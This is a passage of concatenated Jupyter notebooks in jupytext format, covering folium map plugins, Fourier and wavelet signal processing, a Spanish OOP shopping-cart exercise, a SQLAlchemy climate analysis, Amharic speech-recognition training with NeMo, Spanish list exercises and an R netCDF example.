'type': 'FeatureCollection',
'features': features
},
period='P1M',
add_last_point=True,
auto_play=False,
loop=False,
max_speed=1,
loop_button=True,
date_options='YYYY/MM/DD',
time_slider_drag_update=True,
duration='P2M'
).add_to(m)
m.save(os.path.join('results', 'Plugins_7.html'))
m
# -
# ## FeatureGroupSubGroup
#
# ### Sub categories
#
# Disable all markers in the category, or just one of the subgroup.
# +
m = folium.Map(
location=[0, 0],
zoom_start=6
)
fg = folium.FeatureGroup()
m.add_child(fg)
g1 = plugins.FeatureGroupSubGroup(fg, 'g1')
m.add_child(g1)
g2 = plugins.FeatureGroupSubGroup(fg, 'g2')
m.add_child(g2)
folium.Marker([-1,-1]).add_to(g1)
folium.Marker([1,1]).add_to(g1)
folium.Marker([-1,1]).add_to(g2)
folium.Marker([1,-1]).add_to(g2)
l = folium.LayerControl().add_to(m)
m
# -
# ### Marker clusters across groups
#
# Create two subgroups, but cluster markers together.
# +
m = folium.Map(
location=[0, 0],
zoom_start=6
)
mcg = folium.plugins.MarkerCluster(control=False)
m.add_child(mcg)
g1 = folium.plugins.FeatureGroupSubGroup(mcg, 'g1')
m.add_child(g1)
g2 = folium.plugins.FeatureGroupSubGroup(mcg, 'g2')
m.add_child(g2)
folium.Marker([-1,-1]).add_to(g1)
folium.Marker([1,1]).add_to(g1)
folium.Marker([-1,1]).add_to(g2)
folium.Marker([1,-1]).add_to(g2)
l = folium.LayerControl().add_to(m)
m
| examples/Plugins.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import matplotlib.pyplot as plt
import numpy as np
import math
import IPython
# %matplotlib notebook
# -
# # helpers
def plot(x, y):
plt.figure()
plt.plot(x, y)
# # Generate a signal composed of several frequencies
# +
# list of frequencies that are combined
samples = 640
samples_per_second = 640
frequencies = map(lambda f: f * 2*math.pi/samples_per_second, [1, 5])
# generate signal
time = np.arange(0, samples, 1)
signal = np.zeros(len(time))
for f in frequencies:
signal = np.add(signal, np.sin(f*time))
signal = np.add(signal, np.cos(f*time))
plot(time, signal)
# -
# # Add noise
noise_frequency = 20
signal = np.add(signal, np.cos(noise_frequency * time))
signal = np.add(signal, np.sin(noise_frequency * time))
plot(time, signal)
# # Fourier Transform
# +
# compute W[k]
k = np.array(samples)
W_k = np.zeros([samples, samples])
W_k_j = np.zeros([samples, samples])
for k in range(samples):
for n in range(samples):
W_k[k][n] = np.cos(2*math.pi/samples * n * k)
W_k_j[k][n] = np.sin(2*math.pi/samples * n * k)
# multiply the signal by this matrix
dft_real = np.dot(W_k, signal)
dft_img = np.dot(W_k_j, signal)
plot(time, dft_real)
plot(time, dft_img)
# -
# # Remove high frequency noise
# +
dft_real[50:600] = 0
plot(time, dft_real)
dft_img[50:600] = 0
plot(time, dft_img)
# -
# # Synthesize signal back
# +
X_new = np.dot(dft_real, W_k) / samples
X_new_img = np.dot(dft_img, W_k_j) / samples
plot(time, np.add(X_new, X_new_img))
# +
import matplotlib.pyplot as plt
import numpy as np
import wave
import sys
spf = wave.open('sample.wav','r')
#Extract Raw Audio from Wav File
signal = spf.readframes(-1)
signal = np.fromstring(signal, 'Int16')
#If Stereo
if spf.getnchannels() == 2:
print('Just mono files')
plt.figure(1)
plt.title('Signal Wave...')
plt.plot(signal)
plt.show()
# -
IPython.display.Audio(signal, rate=44100)
np.fft(signal)
| Fourier Analysis.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_python3
# language: python
# name: conda_python3
# ---
# <a href="https://colab.research.google.com/github/institutohumai/cursos-python/blob/master/Introduccion/4_Intro_Poo/ejercicio/ejercicio-solucion.ipynb"> <img src='https://colab.research.google.com/assets/colab-badge.svg' /> </a>
# <div align="center"> Recordá abrir en una nueva pestaña </div>
# ## Programación orientada a objetos
#
# En este ejercicio vamos a programar un carrito de compras.
#
# Para esto vamos a escribir dos clases: Carrito e Item.
#
# El ítem va a tener como propiedades un nombre, un precio y una url de la imágen que lo representa. Por default, la url se inicializa en blanco.
#
# El Carrito tiene como propiedad una lista de diccionarios, la variable _lineas.
#
# Los carritos se inicializan vacíos y luego se agregan líneas utilizando el método agregar_línea(). Cada línea es un diccionario con dos claves: "ítem" que contiene un objeto de tipo ítem y "cantidad" según la cantidad que queremos agregar al carrito.
#
# Por último los carritos tienen un método get_total() que devuelve la suma de los precios de los ítems, multiplicados por las cantidades que hay en cada línea.
# +
# Clase Item
class Item():
def __init__(self, nombre, precio, url_imagen=''):
"""
Todas las propiedades del ítem son obligatorias menos url_imagen
En el ítem todas las propiedades son "públicas". Esto va a ser útil para acceder al precio desde el carrito.
"""
self.nombre = nombre
self.precio = precio
self.url_imagen = url_imagen
# +
# Crear los ítems banana de $49.5 y yoghurt de $32.5
banana = Item("banana",49.5)
yoghurt = Item("yoghurt",32.5)
# +
# Crear la clase Carrito
class Carrito():
def __init__(self):
"""
El Carrito siempre se inicializa con una lista de Ítems.
En el carrito la única propiedad es privada.
"""
self._lineas = []
def get_total(self):
total = 0
for linea in self._lineas:
total = total + (linea['cantidad'] * linea['item'].precio)
return total
def agregar_item(self,linea):
self._lineas.append(linea)
# -
# Ahora vamos a instanciar el carrito y agregarle una "línea" con dos bananas y otra con tres yoghures.
# Instancias el carrito
carrito = Carrito()
# Agregar bananas
carrito.agregar_item({'item':banana,'cantidad':2})
# Agregar yoghures
carrito.agregar_item({'item':yoghurt,'cantidad':3})
# Obtener el total
carrito.get_total()
| Introduccion/4_Intro_Poo/ejercicio/ejercicio-solucion.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernel_info:
# name: python3
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
from matplotlib import style
style.use('fivethirtyeight')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import datetime as dt
# # Reflect Tables into SQLAlchemy ORM
# Python SQL toolkit and Object Relational Mapper
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, inspect, func
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect = True)
# We can view all of the classes that automap found
Base.classes.keys()
# Save references to each table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Create our session (link) from Python to the DB
session = Session(engine)
# +
#inspect Measurement table
measurement_inspector = inspect(engine)
measurement_inspector.get_table_names()
#inspect first row
measure_first_row = session.query(Measurement).first()
measure_first_row.__dict__
#columns
measure_columns = measurement_inspector.get_columns('measurement')
for c in measure_columns:
print (c['name'], c['type'])
# +
#inspect Station table
station_inspector = inspect(engine)
station_inspector.get_table_names()
#inspect first row
station_first_row = session.query(Station).first()
station_first_row.__dict__
#columns
station_columns = station_inspector.get_columns('station')
for c in station_columns:
print (c['name'], c['type'])
# -
# # Exploratory Climate Analysis
#Choose a start date and end date for your trip. Make sure that your vacation range is approximately 3-15 days total.
my_vacation = dt.date(2016, 6, 10) - dt.timedelta(days=12)
my_vacation
# +
# Design a query to retrieve the last 12 months of precipitation data and plot the results
#find the last date in the dataset - found 8/23/2017
session.query(func.max(Measurement.date)).all()
# Calculate the date 1 year ago from the last data point in the database
query_date = dt.date(2017, 8, 23) - dt.timedelta(days=365)
# Perform a query to retrieve the data and precipitation scores
Measurements_12m = session.query(Measurement.date, Measurement.prcp).\
filter(Measurement.date > query_date).\
order_by(Measurement.date).all()
# Save the query results as a Pandas DataFrame and set the index to the date column
measurement_df = pd.DataFrame(Measurements_12m, columns=['date', 'prcp'])
measurement_df.set_index('date', inplace = True)
measurement_df.rename(columns={"date":"Date", "prcp":"Precipitation"}, inplace= True)
# Sort the dataframe by date
measurement_df.sort_values('date')
# Use Pandas Plotting with Matplotlib to plot the data
measurement_df.plot(rot=90)
plt.ylabel("Inches")
plt.title("Precipitation by Date")
plt.show()
# -
# Use Pandas to calcualte the summary statistics for the precipitation data
measurement_df.describe()
# Design a query to show how many stations are available in this dataset?
station_count = session.query(Station).count()
station_count
# What are the most active stations? (i.e. what stations have the most rows)
# List the stations and the counts in descending order.
station_func = func.count(Measurement.station)
session.query(Measurement.station, station_func).group_by(Measurement.station).order_by(station_func.desc()).all()
# +
# Using the station id from the previous query, calculate the lowest temperature recorded,
# highest temperature recorded, and average temperature of the most active station
#most action Station ID = USC00519281
temp_query = [Measurement.station,
func.min(Measurement.tobs),
func.max(Measurement.tobs),
func.avg(Measurement.tobs)]
session.query(*temp_query).filter(Measurement.station == "USC00519281").all()
# +
# Choose the station with the highest number of temperature observations.
# Query the last 12 months of temperature observation data for this station and plot the results as a histogram
Station_12m = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date > query_date).\
filter(Measurement.station == "USC00519281").all()
# Save the query results as a Pandas DataFrame
station_df = pd.DataFrame(Station_12m, columns=['date', 'tobs'])
station_df.set_index('date', inplace = True)
station_df.rename(columns={"date":"Date", "tobs":"Tempurature"}, inplace= True)
# Sort the dataframe by date
station_df.sort_values('date')
# Use Pandas Plotting with Matplotlib to plot the data
station_df.plot.hist(rot=90)
plt.xlabel("Temperature")
plt.title("Temperature by Frequency")
plt.show()
# -
# ## Bonus Challenge Assignment
# +
# This function called `calc_temps` will accept start date and end date in the format '%Y-%m-%d'
# and return the minimum, average, and maximum temperatures for that range of dates
def calc_temps(start_date, end_date):
"""TMIN, TAVG, and TMAX for a list of dates.
Args:
start_date (string): A date string in the format %Y-%m-%d
end_date (string): A date string in the format %Y-%m-%d
Returns:
TMIN, TAVE, and TMAX
"""
return session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start_date).filter(Measurement.date <= end_date).all()
# function usage example
print(calc_temps('2012-02-28', '2012-03-05'))
# -
# Use your previous function `calc_temps` to calculate the tmin, tavg, and tmax
# for your trip using the previous year's data for those same dates.
print(calc_temps('2016-05-29','2016-06-10'))
# +
# Plot the results from your previous query as a bar chart.
# Use "Trip Avg Temp" as your Title
# Use the average temperature for the y value
# Use the peak-to-peak (tmax-tmin) value as the y error bar (yerr)
calcs = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= '2016-05-29').filter(Measurement.date <= '2016-06-10').all()
# Save the query results as a Pandas DataFrame and set the index to the date column
calc_df = pd.DataFrame(calcs, columns=['tmin', 'tavg', 'tmax'])
#measurement_df.rename(columns={"date":"Date", "prcp":"Precipitation"}, inplace= True)
# Use Pandas Plotting with Matplotlib to plot the data
calc_df.plot.bar(rot=90)
plt.show()
# +
# Calculate the total amount of rainfall per weather station for your trip dates using the previous year's matching dates.
# Sort this in descending order by precipitation amount and list the station, name, latitude, longitude, and elevation
# +
# Create a query that will calculate the daily normals
# (i.e. the averages for tmin, tmax, and tavg for all historic data matching a specific month and day)
def daily_normals(date):
"""Daily Normals.
Args:
date (str): A date string in the format '%m-%d'
Returns:
A list of tuples containing the daily normals, tmin, tavg, and tmax
"""
sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]
return session.query(*sel).filter(func.strftime("%m-%d", Measurement.date) == date).all()
daily_normals("01-01")
# +
# calculate the daily normals for your trip
# push each tuple of calculations into a list called `normals`
# Set the start and end date of the trip
# Use the start and end date to create a range of dates
# Stip off the year and save a list of %m-%d strings
# Loop through the list of %m-%d strings and calculate the normals for each date
# -
# Load the previous query results into a Pandas DataFrame and add the `trip_dates` range as the `date` index
# Plot the daily normals as an area plot with `stacked=False`
| climate_starter.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: nemo
# language: python
# name: nemo
# ---
# ## Train step 1: Bootstrap from pretrained model
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
# %load_ext autoreload
# %autoreload 2
from Cfg import Cfg
C = Cfg('NIST', 16000, 'amharic', 'build')
from load_pretrained_amharic_model import load_pretrained_amharic_model
model = load_pretrained_amharic_model(C, 0)
# +
import pytorch_lightning as pl
import os, datetime
model_save_dir='save/nemo_amharic'
class ModelCheckpointAtEpochEnd(pl.callbacks.ModelCheckpoint):
def on_epoch_end(self, trainer, pl_module):
metrics = trainer.callback_metrics
metrics['epoch'] = trainer.current_epoch
trainer.checkpoint_callback.on_validation_end(trainer, pl_module)
pid=os.getpid()
dt=datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
checkpoint_callback = ModelCheckpointAtEpochEnd(
filepath=model_save_dir+'/amharic_'+f'{dt}_{pid}'+'_{epoch:02d}',
verbose=True,
save_top_k=-1,
save_weights_only=False,
period=1)
trainer = pl.Trainer(gpus=[0], max_epochs=200, amp_level='O1', precision=16, checkpoint_callback=checkpoint_callback)
# -
from ruamel.yaml import YAML
from omegaconf import DictConfig
config_path = 'amharic_16000.yaml'
yaml = YAML(typ='safe')
with open(config_path) as f:
params = yaml.load(f)
train_manifest=f'{C.build_dir}/train_manifest.json'
test_manifest=f'{C.build_dir}/test_manifest.json'
params['model']['train_ds']['manifest_filepath'] = train_manifest
params['model']['validation_ds']['manifest_filepath'] = test_manifest
model.set_trainer(trainer)
model.setup_training_data(train_data_config=params['model']['train_ds'])
model.setup_validation_data(val_data_config=params['model']['validation_ds'])
model.setup_optimization(optim_config=DictConfig(params['model']['optim']))
from reshuffle_samples import reshuffle_samples
reshuffle_samples(C)
trainer.fit(model)
# ## DEV translation
from Cfg import Cfg
from glob import glob
from package_DEV import package_DEV
from load_pretrained_amharic_model import load_pretrained_amharic_model
version='113'
C = Cfg('NIST', 16000, 'amharic', 'dev', version)
model = load_pretrained_amharic_model(C, 0)
files=list(sorted(glob(f'{C.audio_split_dir}/*.wav')))
translations=model.transcribe(paths2audio_files=files, batch_size=32)
# + active=""
# from package_DEV import package_DEV
# package_DEV(C1, files, translations)
# -
len(files), len(translations)
# +
# coding: utf-8
import sys, os, tarfile
from glob import glob
from pathlib import Path
from datetime import datetime
import numpy as np
import pandas as pd
# -
np.seterr(all='raise')
ctms={'_'.join(os.path.basename(fn.split(',')[0]).split('_')[0:7]): [] for fn in files}
for fn,pred in zip(files,translations):
pred=pred.strip()
if len(pred)==0:
continue
key=os.path.basename(fn)[0:-4].split('_')
ctm='_'.join(key[0:7])
F='_'.join(key[0:6])
channel=key[6]
tstart=float(key[-2])
tend=float(key[-1])
tbeg=tstart/C.sample_rate
tdur=(tend-tstart)/C.sample_rate
chnl='1' if channel=='inLine' else '2'
tokens=pred.split(' ')
n_tokens=len(tokens)
token_lengths=np.array([len(token) for token in tokens])
sum_token_lengths=token_lengths.sum()
token_weights=token_lengths/sum_token_lengths
dt=tdur*token_weights
ends = tdur*np.cumsum(token_weights)
tgrid=(ends-ends[0])+tbeg
token_tstart=list(zip(tokens,tgrid))
if ctms[ctm]: start_from = ctms[ctm][-1][2]
for token, tstart, dt in zip(tokens,tgrid,dt):
if token and token[0] not in ['(', '<']:
row=(F,chnl,tstart,dt,token)
ctms[ctm].append(row)
df=pd.DataFrame(ctms[ctm], columns=['file', 'channel', 'start', 'duration', 'prediction'])
os.chdir('/home/catskills/Desktop/openasr20')
for ctm in ctms:
ctms[ctm].sort()
shipping_dir=f'ship/{C.language}/{C.release}'
os.system(f'mkdir -p {shipping_dir}')
Path(shipping_dir).mkdir(parents=True, exist_ok=True)
timestamp=datetime.today().strftime('%Y%m%d_%H%M')
for ctm in ctms:
fn=f'{C.shipping_dir}/{ctm}.ctm'
with open(fn,'wt', encoding='utf-8') as f:
for row in ctms[ctm]:
line='\t'.join([str(x) for x in row])
f.write(f"{line}\n")
os.chdir(shipping_dir)
tar_fn=f'../../catskills_openASR20_dev_{C.language}_{C.release}.tgz'
with tarfile.open(tar_fn, "w:gz") as tar:
for fn in glob('*.ctm'):
tar.add(fn)
os.chdir('../../..')
print('wrote', tar_fn)
# ## Bad split CTM
ctm
(1112054-1069053)/16000
1112054/16000
| notebooks/CRC_NeMo_007.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import sys,os
ea979path = os.path.abspath('../../')
if ea979path not in sys.path:
sys.path.append(ea979path)
import ea979.src as ia
# # DWT
#
# - [coeficientes da wikipedia:](http://en.wikipedia.org/wiki/Cohen-Daubechies-Feauveau_wavelet)
#
# +
import numpy as np
def wave1d (f,freq=0,inv=0,coeff=0):
r,c = f.shape
g = np.zeros((r,c+8))
g[:, 4:c+4] = f
g[:,-4:] = f[:,-2:-6:-1]
g[:, :4] = f[:,4:0:-1]
if coeff==0: #CDF 5/3
if inv==0: #Transformada
if freq==0: #LOW
s = np.array([0, 0, -1.0/8.0, 2.0/8.0, 6.0/8.0])
else: #HIGH
s = np.array([0, 0, 0, -1.0/2.0, 1.0])
else: #Inversa
if freq==0: #LOW
s = np.array([0, 0, 0, 1.0/2.0, 1.0])
else: #HIGH
s = np.array([0, 0, -1.0/8.0, -2.0/8.0, 6.0/8.0])
else: #CDF 9/7
if inv==0: #Transformada
if freq==0: #LOW
s = np.array([0.02674875741080976,-0.01686411844287495,-0.07822326652898785,0.2668641184428723,0.6029490182363579])
else: #HIGH
s = np.array([0.0 , 0.09127176311424948,-0.05754352622849957,-0.5912717631142470,1.115087052456994])
else: #Inversa
if freq==0: #LOW
s = np.array([0.0 ,-0.09127176311424948,-0.05754352622849957,0.5912717631142470,1.115087052456994])
else: #HIGH
s = np.array([0.02674875741080976, 0.01686411844287495,-0.07822326652898785,-0.2668641184428723,0.6029490182363579])
h = np.empty((r,c))
h = s[0] * g[:,0:-8] + \
s[1] * g[:,1:-7] + \
s[2] * g[:,2:-6] + \
s[3] * g[:,3:-5] + \
s[4] * g[:,4:-4] + \
s[3] * g[:,5:-3] + \
s[2] * g[:,6:-2] + \
s[1] * g[:,7:-1] + \
s[0] * g[:,8:]
return h[:,:c]
# -
def wave2d (f,coeff=0, it=0):
r,c = f.shape
h = np.empty(f.shape)
h[:,:c//2] = wave1d(f,0,0,coeff)[:,1::2]
h[:,c//2:] = wave1d(f,1,0,coeff)[:,::2]
g = np.empty(f.shape)
g[:r//2,:] = np.transpose(wave1d(np.transpose(h),0,0,coeff)[:,1::2])
g[r//2:,:] = np.transpose(wave1d(np.transpose(h),1,0,coeff)[:,::2])
if it==0:
return g
else:
g[:c//2,:r//2] = wave2d(g[:c//2,:r//2],coeff, it-1)
return g
def itwave1d (f,coeff=0):
r,c = f.shape
rec = np.empty((c,r))
recl = np.zeros((c,r))
recl[:,1::2] = np.transpose(f)[:,:r//2]
recl = wave1d(recl,0,1,coeff)
rech = np.zeros((c,r))
rech[:,::2] = np.transpose(f)[:,r//2:]
rech = wave1d(rech,1,1,coeff)
rec = recl + rech
return rec
def iwave2d (f,coeff=0,it=0):
r,c = f.shape
if it>0:
f[:c//2,:r//2] = iwave2d(f[:c//2,:r//2],coeff,it-1)
rect = np.empty((c,r))
rect = itwave1d(f,coeff) # filtro na vertical
rec = np.empty((r,c))
rec = itwave1d(rect,coeff) # filtro na horizontal
return rec
# ## Wavelet CDF5/3
# +
f = mpimg.imread('../data/cameraman.tif')
#f = f[:-1,:-1]
print(f.shape)
ia.adshow(f,'Input Image')
# +
print(f.shape)
g = wave2d(f,0,5)
ia.adshow(ia.normalize(g),'Transformada wavelet CDF 5/3')
rec = iwave2d(g,0,5)
ia.adshow(ia.normalize(rec),'Imagem reconstruida CDF 5/3')
print('Maximo diferenca CDF 5/3', np.abs(f-rec).max())
# -
# ## Wavelet CDF9/7
# +
print(f.shape)
g = wave2d(f,1,2)
ia.adshow(ia.normalize(g),'Transformada wavelet CDF 9/7')
rec = iwave2d(g,1,2)
ia.adshow(ia.normalize(rec),'Imagem reconstruida CDF 9/7')
print('Maximo diferenca CDF 9/7', np.abs(f-rec).max())
# -
# ## Espectro dos Filtros CDF
# +
#tcdf_53_lf = np.array([0 , 0 , -1.0/8.0, 2.0/8.0, 6.0/8.0, 2.0/8.0, -1.0/8.0, 0 , 0 ])
#tcdf_53_hf = np.array([0 , 0 , 0, -1.0/2.0, 1.0 , -1.0/2.0, 0, 0 , 0 ])
#icdf_53_lf = np.array([0 , 0 , 0, 1.0/2.0, 1.0 , 1.0/2.0, 0, 0 , 0 ])
#icdf_53_hf = np.array([0 , 0 , -1.0/8.0, -2.0/8.0, 6.0/8.0, -2.0/8.0, -1.0/8.0, 0 , 0 ])
#tcdf_97_lf = np.array([0.027, -0.017, -0.078, 0.267, 0.603, 0.267, -0.078, -0.017, 0.027])
#tcdf_97_hf = np.array([0.0 , 0.091, -0.056, -0.591, 1.115, -0.591, -0.056, 0.091, 0.0 ])
#icdf_97_lf = np.array([0.0 , -0.091, -0.056, 0.591, 1.115, 0.591, -0.056, -0.091, 0.0 ])
#icdf_97_hf = np.array([0.027, 0.017, -0.078, -0.267, 0.603, -0.267, -0.078, 0.017, 0.027])
tcdf_53_lf = np.array([-1.0/8.0, 2.0/8.0, 6.0/8.0, 2.0/8.0, -1.0/8.0, 0, 0, 0, 0])
tcdf_53_hf = np.array([-1.0/2.0, 1.0 , -1.0/2.0, 0 , 0 , 0, 0, 0, 0])
icdf_53_lf = np.array([ 1.0/2.0, 1.0 , 1.0/2.0, 0 , 0 , 0, 0, 0, 0])
icdf_53_hf = np.array([-1.0/8.0, -2.0/8.0, 6.0/8.0, -2.0/8.0, -1.0/8.0, 0, 0, 0, 0])
tcdf_97_lf = np.array([ 0.027, -0.017, -0.078, 0.267, 0.603, 0.267, -0.078, -0.017, 0.027])
tcdf_97_hf = np.array([ 0.091, -0.056, -0.591, 1.115, -0.591, -0.056, 0.091, 0.0 , 0 ])
icdf_97_lf = np.array([-0.091, -0.056, 0.591, 1.115, 0.591, -0.056, -0.091, 0.0 , 0 ])
icdf_97_hf = np.array([ 0.027, 0.017, -0.078, -0.267, 0.603, -0.267, -0.078, 0.017, 0.027])
print(np.sum(np.abs(tcdf_53_lf)*np.abs(tcdf_53_lf))/5)
print(np.sum(np.abs(tcdf_53_hf)*np.abs(tcdf_53_hf))/3)
Tcdf_53_lf = np.fft.fft(tcdf_53_lf)
Tcdf_53_hf = np.fft.fft(tcdf_53_hf)
Icdf_53_lf = np.fft.fft(icdf_53_lf)
Icdf_53_hf = np.fft.fft(icdf_53_hf)
Tcdf_97_lf = np.fft.fft(tcdf_97_lf)
Tcdf_97_hf = np.fft.fft(tcdf_97_hf)
Icdf_97_lf = np.fft.fft(icdf_97_lf)
Icdf_97_hf = np.fft.fft(icdf_97_hf)
fig = plt.figure()
plt.subplot(2, 1, 1)
plt.plot(np.abs(Tcdf_53_hf),'b', label = 'Análise HP')
plt.plot(np.abs(Tcdf_53_lf),'r', label = 'Análise LP')
plt.plot(np.abs(Icdf_53_hf),'c', label = 'Síntese HP')
plt.plot(np.abs(Icdf_53_lf),'m', label = 'Síntese LP')
plt.grid(True)
plt.legend()
plt.title('CDF 5/3 Resposta em frequência dos filtros')
fig = plt.figure()
plt.subplot(2, 1, 2)
plt.plot(np.abs(Tcdf_97_hf),'b', label = 'Análise HP')
plt.plot(np.abs(Tcdf_97_lf),'r', label = 'Análise LP')
plt.plot(np.abs(Icdf_97_hf),'c', label = 'Síntese HP')
plt.plot(np.abs(Icdf_97_lf),'m', label = 'Síntese LP')
plt.grid(True)
plt.legend()
plt.title('CDF 9/7 Resposta em frequência dos filtros')
# -
# ## Espectro da imagem
# +
nb = ia.nbshow(2)
nb.nbshow(f,'f: Input, mean: %3.2f' % (np.mean(f),))
F = np.fft.fft2(f)
nb.nbshow(ia.dftview(F), "F: DFT da original")
nb.nbshow()
r,c = f.shape
lowf = wave1d(f,0,0,0)
nb.nbshow(ia.normalize(lowf) ,'lowf: passa baixas mean: %3.2f' % (np.mean(lowf),))
Flow = np.fft.fft2(lowf)
nb.nbshow(ia.dftview(Flow), "Flow: DFT da passa baixas horizontal")
nb.nbshow()
highf = wave1d(f,1,0,0)
nb.nbshow(ia.normalize(highf),'highf: Imagem com filto passa altas mean: %3.2f' % (np.mean(highf),))
Fhigh = np.fft.fft2(highf)
nb.nbshow(ia.dftview(Fhigh), "Fhigh: DFT da passa altas horizontal")
nb.nbshow()
# -
# ## Espectro da imagem apos transformada wavelet
H,W = f.shape
g = wave2d(f,0,0)
ia.adshow(ia.normalize(g),'Transformada wavelet CDF 9/7')
FLL = np.fft.fft2(g[:H//2,:W//2])
FLH = np.fft.fft2(g[:H//2,W//2:])
FHL = np.fft.fft2(g[H//2:,:W//2])
FHH = np.fft.fft2(g[H//2:,W//2:])
nb = ia.nbshow(ncols=2)
nb.nbshow(ia.dftview(FLL))
nb.nbshow(ia.dftview(FLH))
nb.nbshow(ia.dftview(FHL))
nb.nbshow(ia.dftview(FHH))
Fview = ia.dftview(np.fft.fft2(f))
Fview[H//4:1+H//4,:]=255
Fview[3*H//4:1+3*H//4,:]=255
Fview[:,W//4:1+W//4]=255
Fview[:,3*W//4:1+3*W//4]=255
nb.nbshow(Fview)
nb.nbshow()
| master/wavelets.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [Root]
# language: python
# name: Python [Root]
# ---
# + [markdown] id="3oxedQvB1c5p" colab_type="text" slideshow={"slide_type": "skip"}
# [texto del enlace](https://)<table>
# <tr align=left><td><img align=left src="https://drive.google.com/uc?export=view&id=1edefIUL_iwWk4K3KtrNynSJ0Qvpdb2YY">
# <td>Text provided under a Creative Commons Attribution license, CC-BY. All code is made available under the FSF-approved MIT license. (c) <NAME></td>
# </table>
# + [markdown] id="Xq_hs1jGRtLR" colab_type="text"
# *“People think that computer science is the art of geniuses but the actual reality is the opposite, just many people doing things that build on eachother, like a wall of mini stones.” *
#
# __<NAME>__
# + [markdown] id="zYW3ZR0NSLk7" colab_type="text"
# ## Problemas
# + [markdown] id="Lw7Zrm0lJ52N" colab_type="text"
# * Encuentre el valor máximo en una lista, sin utilizar funciones nativas
# + id="RUcWXtUQJ9E0" colab_type="code" colab={}
# + [markdown] id="B72fnfAPFZNz" colab_type="text"
# * Imprima todos los números negativos en una lista
# + id="JiCFfhv2FZWL" colab_type="code" colab={}
# + [markdown] id="FP5SChrPE1qp" colab_type="text"
# * Ordene una lista de números
# + id="HXJhejw4FLsy" colab_type="code" colab={}
# + [markdown] id="OKKbv1BKFMex" colab_type="text"
# - Dado un número n escriba todas las posibles permutaciones de los enteros entre 1 y n
# + id="1f_EIYa9FMp2" colab_type="code" colab={}
# + [markdown] id="PgqWFNG5MH_S" colab_type="text"
# - Encuentre todos los pares de elementos en una lista cuya suma sea igual a un número especificado
# + id="CUESPjKTMIJS" colab_type="code" colab={}
# + [markdown] id="w6aG4ekFFfv8" colab_type="text"
# - Calcule el promedio y la suma de los elementos en una lista
# + id="-91xnpfrFf3S" colab_type="code" colab={}
# + [markdown] id="47xu0dynFw9R" colab_type="text"
# - Calcule la suma de los elementos de dos listas
# + id="MzX3bSIxFxIa" colab_type="code" colab={}
# + [markdown] id="S599fJnrLlk7" colab_type="text"
# * Encuentre el segundo elemento más grande en una lista
# + id="Uvy08g4MLlxU" colab_type="code" colab={}
# + [markdown] id="kluLrKL7LphH" colab_type="text"
# * Mezcle los elementos de dos listas en una sola lista ordenada
# + id="9PisdmFlLprA" colab_type="code" colab={}
# + [markdown] id="1emFpwGjL6o9" colab_type="text"
# * Encuentre los dos elementos de una lista con la diferencia más grande entre ellos
# + id="O4FldweFcSAj" colab_type="code" colab={}
# + [markdown] id="GjFkz87icRKv" colab_type="text"
# * Encuentre los dos elementos de una lista cuya suma sea más cercana a cero
# + id="ycutVAZZL6wL" colab_type="code" colab={}
# + [markdown] id="gbgnZsxccVJc" colab_type="text"
# * Calcule la lista que resulta de la unión entre los elementos de otras dos listas
# + id="lEOuUIJNcVUE" colab_type="code" colab={}
# + [markdown] id="AxQWaXKjcYGm" colab_type="text"
# * Calcule la lista que resulta de la intersección entre los elementos de otras dos listas
# + id="P0QvK-JrcYPl" colab_type="code" colab={}
# + [markdown] id="CUX_zeJKcand" colab_type="text"
# * Dado un conjunto de elementos en una lista calcule su (histograma)[https://es.wikipedia.org/wiki/Histograma]
# + id="aC8aejmlcaym" colab_type="code" colab={}
# + [markdown] id="FN4kJotHcdX0" colab_type="text"
# * Convierta un texto de código morse a inglés y viceversa
# + id="loTsOI4CcdiU" colab_type="code" colab={}
# + [markdown] id="zXCcY8eAcf1r" colab_type="text"
# * Determine si una cadena de texto es palindrome o no
# + id="Nwmr27ZscgAG" colab_type="code" colab={}
| Exercises/05_List.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R
# language: R
# name: ir
# ---
# This is a simple script that demonstrates how to open netcdf files (a typical format of file used for storing large amounts of data, and often used to display output from 3D Earth system models). This example uses a version of the marine reservoir ages output from Butzin et al. 2017.
# load required packages
library(ncdf4)
library(maps)
#Open netcdf file
nc <- nc_open( "mra14_intcal13_pd_21kcalBP.nc")
#list names of variables in netcdf file
names(nc$var)
#list names of dimensions in netcdf file
names(nc$dim)
